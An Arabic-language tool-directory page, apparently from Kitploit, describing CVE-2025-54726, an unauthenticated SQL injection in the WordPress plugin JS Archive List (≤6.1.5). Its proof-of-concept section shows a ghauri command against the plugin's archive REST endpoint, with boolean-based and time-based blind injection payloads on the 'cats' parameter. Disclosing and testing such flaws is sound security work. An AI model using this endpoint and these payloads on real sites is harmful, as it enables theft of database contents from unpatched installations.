Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-54726 — JS Archive List <= 6.1.5 - حقن SQL غير مصادق عليه | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2025-54726
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2025-54726

CVE-2025-54726

JS Archive List <= 6.1.5 - حقن SQL غير مصادق عليه

عرض المستودع
منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-54726

JS Archive List <= 6.1.5 - حقن SQL غير مصادق عليه

الوصف

إضافة JS Archive List لووردبريس عرضة لحقن SQL في جميع الإصدارات حتى 6.1.5 نتيجة لعدم كفاية الهروب (escaping) في المعامل المقدم من المستخدم وعدم التحضير الكافي لاستعلام SQL الموجود. هذا يسمح للمهاجمين غير المصادق عليهم بإضافة استعلامات SQL إضافية إلى الاستعلامات الموجودة بالفعل، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.

التفاصيل

  • النوع: إضافة (plugin)
  • المعرف (Slug): jquery-archive-list-widget
  • الإصدار المتأثر: 6.1.5
  • درجة CVSS: 7.5
  • تصنيف CVSS: عالية (High)
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2025-54726
  • الحالة: نشط (Active)

POC

root@kitploit:~
ghauri  -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"


  ________.__                        .__  {1.4.1}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 An advanced SQL injection detection & exploitation tool.



[*] starting @ 16:39:05 /2025-09-25/

[16:39:05] [INFO] testing connection to the target URL
Ghauri resumed the following injection point(s) from stored session:
---
Parameter: cats (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cats=1 AND 01609=1609&exclusionType=exclude

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (IF - comment)
    Payload: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] testing MySQL
[16:39:05] [INFO] confirming MySQL
[16:39:06] [INFO] the back-end DBMS is MySQL

تنزيل الأداة